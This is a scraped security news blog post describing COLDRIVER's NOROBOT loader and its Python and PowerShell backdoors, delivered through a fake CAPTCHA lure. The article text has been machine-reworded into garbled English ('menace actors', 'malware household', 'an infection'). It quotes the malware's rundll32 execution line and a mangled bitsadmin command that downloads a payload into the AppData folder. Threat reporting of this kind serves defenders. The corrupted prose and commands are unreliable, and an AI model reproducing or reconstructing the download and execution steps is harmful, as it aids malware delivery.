Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

New LOSTKEYS Malware Linked to Russia State-Sponsored Hacker Group COLDRIVER

Posted on October 21, 2025October 21, 2025 By CWS

Over the summer season of 2025, a novel malware household emerged following the general public disclosure of the LOSTKEYS implant.

This new pressure was quickly weaponized in a collection of extremely focused campaigns towards coverage advisors, non-governmental organizations, and dissidents.

Leveraging a refreshed lure referred to as COLDCOPY ClickFix, menace actors masqueraded the payload as a CAPTCHA verification to dupe customers into executing a malicious DLL by way of rundll32.

Early samples demonstrated an aggressive improvement tempo marked by a number of iterations of the downloader element and backdoor phases.

Google Cloud analysts famous that the loader, dubbed NOROBOT, started deployment inside days after LOSTKEYS was profiled.

Not like its predecessor— which relied on a multi-stage PowerShell method—NOROBOT invoked rundll32 iamnotarobot.dll,humanCheck to bootstrap the an infection chain.

Subsequent phases fetched partial cryptography keys and complementary payloads from attacker-controlled infrastructure, recombining elements to decrypt and set up a Python backdoor, YESROBOT.

Preliminary operations noticed YESROBOT deployed briefly in late Might earlier than being shortly changed by a streamlined PowerShell backdoor, MAYBEROBOT.

This transformation addressed the detection noise created by a bundled Python interpreter and enabled extra versatile command execution with out requiring a full interpreter runtime.

Each backdoors maintained minimal built-in features, counting on the operator to provide complicated instructions over HTTPS to a hardcoded command-and-control server.

Inside months, the malware reached its third main iteration, exhibiting not solely simplified supply but additionally rotating infrastructure and file naming conventions to evade community defenders.

Malware improvement overview illustrates this evolution, from the preliminary complicated downloader to the condensed logon script mechanism.

Malware improvement overview (Supply – Google Cloud)

COLDCOPY trying to lure the consumer to execute NOROBOT highlights the social engineering employed to trick targets into executing a seemingly innocuous DLL.

An infection Mechanism

The an infection begins when a consumer visits a compromised web page posing as a customized CAPTCHA. The web page prompts execution of iamnotarobot.dll, invoking the humanCheck export.

As soon as loaded, NOROBOT retrieves encrypted payload fragments by way of bitsadmin:-

bitsadmin /switch downloadJob /obtain /precedence regular %APPDATApercentlibsystemhealthcheck.py

Subsequent, the loader writes a part of the AES key to the registry and schedules a process to assemble and decrypt the ultimate payload.

This staged method forces defenders to gather a number of artifacts—downloads, registry entries, scheduled duties—to reconstruct the whole chain.

By splitting cryptographic keys and alternating downloader complexity, COLDRIVER maintains operational safety whereas exacting intelligence assortment from high-value targets.

Comply with us on Google Information, LinkedIn, and X to Get Extra Prompt Updates, Set CSN as a Most popular Supply in Google.

Cyber Security News Tags:COLDRIVER, Group, Hacker, Linked, LOSTKEYS, Malware, Russia, StateSponsored

Post navigation

Previous Post: Dataminr to Acquire ThreatConnect for $290 Million
Next Post: CISA Warns of Exploited Apple, Kentico, Microsoft Vulnerabilities

Related Posts

SVG Security Analysis Toolkit to Detect Malicious Scripts Hidden in SVG files Cyber Security News
Hackers Exploiting Hikvision Camera Vulnerability to Access Sensitive Information Cyber Security News
Lazarus Subgroup ‘TraderTraitor’ Attacking Cloud Platforms and Poisoning Supply Chains Cyber Security News
20 Best Inventory Management Tools in 2025 Cyber Security News
How to Radically Cut Response Time for Each Security Incident  Cyber Security News
Cisco IOS XE Wireless Controllers Vulnerability Enables Full Device Control for Attackers Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Gravwell Closes $15.4M Funding Round to Expand Data Analytics and Security Platform
  • CISA Warns of Apple macOS, iOS, tvOS, Safari, and watchOS Vulnerability Exploited in Attacks
  • SBOM Pioneer Allan Friedman Joins NetRise to Advance Supply Chain Visibility
  • Meta Rolls Out New Tools to Protect WhatsApp and Messenger Users from Scams
  • Defakto Raises $30 Million for Non-Human IAM Platform

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Gravwell Closes $15.4M Funding Round to Expand Data Analytics and Security Platform
  • CISA Warns of Apple macOS, iOS, tvOS, Safari, and watchOS Vulnerability Exploited in Attacks
  • SBOM Pioneer Allan Friedman Joins NetRise to Advance Supply Chain Visibility
  • Meta Rolls Out New Tools to Protect WhatsApp and Messenger Users from Scams
  • Defakto Raises $30 Million for Non-Human IAM Platform

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News